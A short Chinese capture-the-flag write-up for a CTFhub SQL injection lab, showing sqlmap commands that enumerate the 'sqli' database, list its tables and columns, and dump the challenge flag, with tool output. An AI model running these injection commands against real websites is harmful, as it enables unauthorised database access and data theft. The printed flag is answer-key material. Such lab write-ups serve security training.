字符型注入
1:打开配置环境看到
那先输入1看看,
发现URL出现了改变,这下可以直接使用kali自带的SQLmap
SQLmap--kali
1:打开kali ,输入我们的目标URL
[19:24:10] [INFO] starting wizard interface
Please enter full target URL (-u): http://challenge-aabda6a71cc14ee4.sandbox.ctfhub.com:10800/?id=1
2:然后我们得到了
web application technology: OpenResty 1.21.4.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.22-MariaDB-0+deb10u1'
current user: 'root@localhost'
current database: 'sqli'
current user is DBA: True
数据库名是sqli
3:查看数据名下的表
sqlmap -u "http://challenge-0b7c0ebf73b5a679.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables
得到表名flag和news,我们就去看flag表名下的列
4:表名下的列
sqlmap -u"http://challenge-1263a0320a449d85.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns
5:爆破表里内容
sqlmap -u"http://challenge-27de31105a5f1c90.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag -C flag --dump
得到
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{1d3df9118e193589ecf16fe3} |
+----------------------------------+